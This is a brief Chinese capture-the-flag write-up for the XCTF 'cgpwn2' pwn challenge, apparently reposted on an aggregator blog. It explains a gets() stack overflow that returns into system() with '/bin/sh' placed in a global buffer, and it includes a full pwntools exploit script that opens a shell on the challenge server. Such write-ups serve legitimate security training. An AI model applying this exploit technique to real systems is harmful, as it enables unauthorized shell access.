[攻防世界 pwn]——cgpwn2
生活随笔
收集整理的這篇文章主要介紹了
[攻防世界 pwn]——cgpwn2
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[攻防世界 pwn]——cgpwn2
- 題目地址: https://adworld.xctf.org.cn/
- 題目:
checksec一下看看, 僅僅開啟了NX保護
在IDA中 look look, 竟然發現了system函數不過參數不對
’
思路
先將 "/bin/sh" 寫入name, 然后利用gets進行棧溢出, system作為返回值, name作為system的參數
exploit
from pwn import * p=remote("111.200.241.244",53774) name_addr = 0x0804A080 sys_addr = 0x0804855A payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + p32(name_addr)p.sendlineafter("please tell me your name\n", '/bin/sh') p.sendlineafter("hello,you can leave some message here:\n",payload) p.interactive()總結
以上是生活随笔為你收集整理的[攻防世界 pwn]——cgpwn2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——int_over
- 下一篇: [攻防世界 pwn]——level3